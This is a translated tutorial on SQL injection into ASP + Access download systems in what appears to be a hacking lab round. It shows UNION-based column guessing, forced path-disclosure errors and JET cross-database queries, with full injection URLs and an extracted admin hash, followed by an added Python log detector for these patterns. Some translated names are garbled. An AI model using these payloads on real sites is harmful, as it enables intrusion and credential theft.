You may still remember MSSQL's cross-database queries. In fact, a cross query between two databases can also be implemented in Access. Next I will introduce Access cross-database queries.
First, let's see how Access queries an mdb file. Create an empty database and, from it, query the admin table in the database D:\daos\db\daidalos.mdb. The SQL statement is:
SELECT * FROM admin IN "D:\daos\db\daidalos.mdb"
The contents of the admin table in the target database are then returned:
In a real ASP injection, two SELECT statements are needed at the same time. Anyone familiar with PHP + MySQL injection will immediately think of UNION queries, and they can be used in Access as well. A further advantage of UNION queries is that we no longer have to guess the data one character at a time: the contents of a field can be exposed directly, just as in MySQL + PHP injection (mix has already written a detailed article on this). Implementing a cross-database query as shown above requires two conditions:
1. For a UNION query, you must know the number of columns in the table of the preceding SELECT statement.
2. You must know the location of the target database, i.e. its absolute path.
Condition 1 can be guessed manually from the error message, or automated.
Condition 2 is harder, but we can use the "access brute-force library" technique (forcing an error that discloses the database path). Some people will say that once we know the database location we can simply download the database. In fact, databases today are generally protected against download, and some are not in the web directory at all.
The first level of the fourth round of the anti-DDoS pro lab consists of two ASP + Access download systems: one is the rain point Download System and the other is the stolen handsome Download System. After testing, the hacker download system exposes its database path but does not allow the database to be downloaded, and there seems to be no injection. The rain point download system, on the other hand, is full of holes: its database path can be exposed, the database can be downloaded directly, and injection is also possible. However, the rain point backend is very simple and there is nothing useful in it. Our goal is to get the backend password of the hacker system. I will show you how to use the injection point of the rain point system for a cross-database query and obtain the hacker system's backend password:
We know that list.asp of the rain point system is injectable. First we need to find the number of columns in the table for the UNION, so we submit:
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201%20from%20userinfo
The response is:
Microsoft JET Database Engine error '80040e14'
The number of columns in the two selected tables or queries of a union query do not match.
/yddown/list.asp, line 51
The column count is wrong. I wrote a perl script to guess the column count automatically (see the code below).
When we submit:
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201,2,3%20from%20userinfo
no error is returned:
Haha! We have obtained the number of columns, and the page shows us that column 1 is the one displayed, which is where the result of our query will appear.
Now we still need the location of the hacker system's database. Simply submit the following:
http://219.237.81.46/dsdown%5cregs.asp
The path is returned in the error:
Microsoft JET Database Engine error '20140901'
'D:\111\db\kljdsld.asa' is not a valid path. Make sure that the path name is spelled correctly and that you are connected to the server on which the file resides.
/dsdown/db/user.asp, line 6
(Note: the disclosed path is not necessarily "complete". The actual path is D:\111\dsdown\db\kljdsld.asa)
Next we construct a cross-database URL as follows:
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20admin,3,2%20from%20admin%20in%20"D:\111\dsdown\db\kljdsld.asa"%20where%20id=1
The statement above UNION-queries the data in D:\111\db\kljdsld.asa:
The username is admin; next we retrieve the password in the same way:
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20pws,3,2%20from%20admin%20in%20"D:\111\dsdown\db\kljdsld.asa"%20where%20id=1
This returns a 32-character MD5 hash: 77e6cbb3f9468eadb655ae6826357922.
Success. Here I just wanted to demonstrate the cross-database query :).
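From the defender's side, both steps of the walkthrough above leave distinctive traces in the web server log: the UNION SELECT used to enumerate columns, the JET "FROM table IN "path"" clause that reaches into a second database, and the encoded backslash (%5c) request that forces the path-disclosing error. The following detector is an added example, not code from the original article; the log format, host and paths in the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (W3C-style fields: client-ip method uri-stem uri-query status).
# IP addresses, paths and the database location are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 GET /yddown/list.asp id=75 200
10.0.0.9 GET /yddown/list.asp id=75%20union%20select%201,2,3%20from%20userinfo 500
10.0.0.9 GET /dsdown%5cregs.asp - 500
10.0.0.9 GET /yddown/list.asp id=75%20union%20select%20admin,3,2%20from%20admin%20in%20%22D:%5Cexample%5Cdb%5Cdata.asa%22%20where%20id=1 200
"""

UNION_RE = re.compile(r"\bunion\b[\s\S]{0,20}?\bselect\b", re.I)
# JET/Access cross-database clause: FROM <table> IN "<absolute path>"
CROSS_DB_RE = re.compile(r"\bfrom\b\s+\w+\s+\bin\b\s*['\"]([^'\"]+)['\"]", re.I)

def decode(value):
    # Decode twice so %2520-style double encoding does not hide keywords.
    return unquote_plus(unquote_plus(value))

def analyze_request(uri_stem, uri_query):
    """Return a list of (indicator, detail) tuples for one request."""
    findings = []
    stem = decode(uri_stem)
    query = decode(uri_query) if uri_query != "-" else ""
    # An encoded backslash in the path breaks the script's relative database
    # path and makes JET emit an error that discloses the absolute location.
    if "\\" in stem or "%5c" in uri_stem.lower():
        findings.append(("path-disclosure-probe", stem))
    if UNION_RE.search(query):
        findings.append(("union-select", query))
    m = CROSS_DB_RE.search(query)
    if m:
        # The captured group is the second database the query reaches into.
        findings.append(("access-cross-db", m.group(1)))
    return findings

def scan_log(text):
    """Map each suspicious line number (1-based) to its findings."""
    report = {}
    for n, line in enumerate(text.splitlines(), 1):
        parts = line.split()
        if len(parts) < 5:
            continue
        findings = analyze_request(parts[2], parts[3])
        if findings:
            report[n] = findings
    return report

if __name__ == "__main__":
    for n, findings in scan_log(SAMPLE_LOG).items():
        print(n, findings)
```

The "access-cross-db" finding carries the absolute path named in the IN clause, which tells the responder exactly which other database on the host was read.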
Summary
This article mainly introduces two very useful methods. First, in ASP injection we no longer have to guess the data one character at a time, which is very troublesome when Chinese characters are involved: using UNION to return the data directly exposes it in one step, whether it contains Chinese characters or special characters. Second, the cross-database query is very flexible to use and can bring you unexpected gains during a penetration test.